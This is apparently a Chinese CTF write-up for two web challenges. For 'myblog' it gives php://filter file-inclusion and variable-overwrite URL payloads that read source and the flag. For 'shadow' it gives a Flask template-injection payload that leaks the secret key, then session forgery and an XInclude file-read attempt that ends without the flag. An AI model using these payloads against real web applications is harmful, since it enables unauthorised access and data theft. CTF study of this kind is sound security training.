myblog
这道题脑洞很大。。。
index.php的header中有flag: JTNGZmxhZw==
,解base64得到参数%3Fflag
,猜测index.php存在文件包含,运用flag参数读文件。
payload:http://58.20.46.150:26293/index.php?flag=php://filter/convert.base64-encode/resource=index
1 |
|
提示aboutyou后端,about里也提到了base64,猜测存在YWJvdXQ=.php
payload:http://58.20.46.150:26293/index.php?flag=php://filter/convert.base64-encode/resource=YWJvdXQ=
1 |
|
变量覆盖,让$sign为空,$file读取不存在的文件,让$falg为flag读取文件。
payload:http://58.20.46.150:26293/YWJvdXQ=.php?sign=&filename=123&falg=flag
shadow
这题没有拿到flag,但是感觉也进行了绝大部分了,记录一下
题目提示有upload,直接访问提示Only admin can use it!
尝试模版注入拿到secret_key进行session伪造,发现访问不存在的页面可以进行模版注入
payload:http://58.20.46.150:25524/{{ 1+1 }}
过滤了括号等,和twctf2018的Shrine相似
CTFtime.org _ TokyoWesterns CTF 4th 2018 _ Shrine _ Writeup
payload:http://58.20.46.150:25524/{{ url_for.__globals__['current_app'].config }}
拿到secret_key为:as/*d21as-+dhasod5a4s54:><*()dfdsf
构造session,以admin登陆,访问upload,发现文件的表单名是xml,猜测可以上传xml内容进行解析
用xinclude来读取文件
1 |
|
但是最后没有找到flag,比赛结束了。。。不知道是不是有没发现的东西。